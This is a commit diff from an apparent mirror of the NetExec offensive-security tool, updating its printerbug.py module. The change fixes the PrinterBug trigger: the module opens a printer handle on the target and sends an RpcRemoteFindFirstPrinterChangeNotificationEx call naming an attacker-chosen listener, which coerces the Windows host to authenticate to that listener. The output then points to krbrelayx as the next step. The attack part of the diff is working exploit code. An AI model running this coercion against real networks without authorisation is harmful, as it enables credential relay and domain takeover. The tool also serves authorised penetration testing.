swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update printerbug.py 

Fix trigger

Signed-off-by: Hakan Yavuz <lodos05@gmail.com>
main
Hakan Yavuz 2024-02-05 16:11:02 +03:00 committed by mpgn
parent 188f909e64
commit e422a17080
1 changed files with 33 additions and 35 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
nxc/modules/printerbug.py
View File

@ -1,5 +1,5 @@
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5 import transport, rprn
from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD
from impacket.dcerpc.v5.rpcrt import DCERPCException
@ -41,7 +41,7 @@ class NXCModule:
if dce is not None:
context.log.debug("Target is vulnerable to PrinterBug")
trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener)
trigger.RpcRemoteFindFirstPrinterChange(dce, self.listener,connection.host if not connection.kerberos else connection.hostname + "." + connection.domain)
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/dirkjanm/krbrelayx")
dce.disconnect()
@ -67,36 +67,15 @@ class DCERPCSessionError(DCERPCException):
################################################################################
# RPC CALLS
################################################################################
class RpcRemoteFindFirstPrinterChange(NDRCALL):
opnum = 13
structure = (
("ServerName", WSTR),
("RootShare", WSTR),
("ApiFlags", DWORD),
)
class RpcRemoteFindFirstPrinterChangeResponse(NDRCALL):
structure = (("ErrorCode", ULONG),)
class NetrDfsAddRoot(NDRCALL):
opnum = 12
structure = (
("ServerName", WSTR),
("RootShare", WSTR),
("Comment", WSTR),
("ApiFlags", DWORD),
)
class NetrDfsAddRootResponse(NDRCALL):
structure = (("ErrorCode", ULONG),)
class TriggerAuth:
def connect(self, username, password, domain, lmhash, nthash, aesKey, target, doKerberos, dcHost):
rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\spoolss]" % target)
rpctransport.set_dport(445)
if hasattr(rpctransport, "set_credentials"):
rpctransport.set_credentials(
username=username,
@ -120,23 +99,42 @@ class TriggerAuth:
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
return None
try:
dce.bind(uuidtup_to_bin(("12345678-1234-ABCD-EF00-0123456789AB", "1.0")))
dce.bind(rprn.MSRPC_UUID_RPRN)
except Exception as e:
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
return None
nxc_logger.debug("[+] Successfully bound!")
return dce
def RpcRemoteFindFirstPrinterChange(self, dce, listener):
def RpcRemoteFindFirstPrinterChange(self, dce, listener,target):
nxc_logger.debug("[-] Sending RpcRemoteFindFirstPrinterChange!")
try:
request = RpcRemoteFindFirstPrinterChange()
request["ServerName"] = f"{listener}\x00"
request["RootShare"] = "test\x00"
request["ApiFlags"] = 1
if self.args.verbose:
nxc_logger.debug(request.dump())
dce.request(request)
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % target)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
nxc_logger.error('Connection failed - skipping host!')
return
elif str(e).upper().find('ACCESS_DENIED'):
# We're not admin, bye
nxc_logger.error('Access denied - RPC call was denied')
dce.disconnect()
return
else:
raise
nxc_logger.debug('Got handle')
try:
request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
request['hPrinter'] = resp['pHandle']
request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
request['pszLocalMachine'] = '\\\\%s\x00' % listener
request['pOptions'] = NULL
nxc_logger.debug(request.dump())
except Exception as e:
nxc_logger.debug(e)
try:
dce.request(request)
except Exception as e:
nxc_logger.debug(e)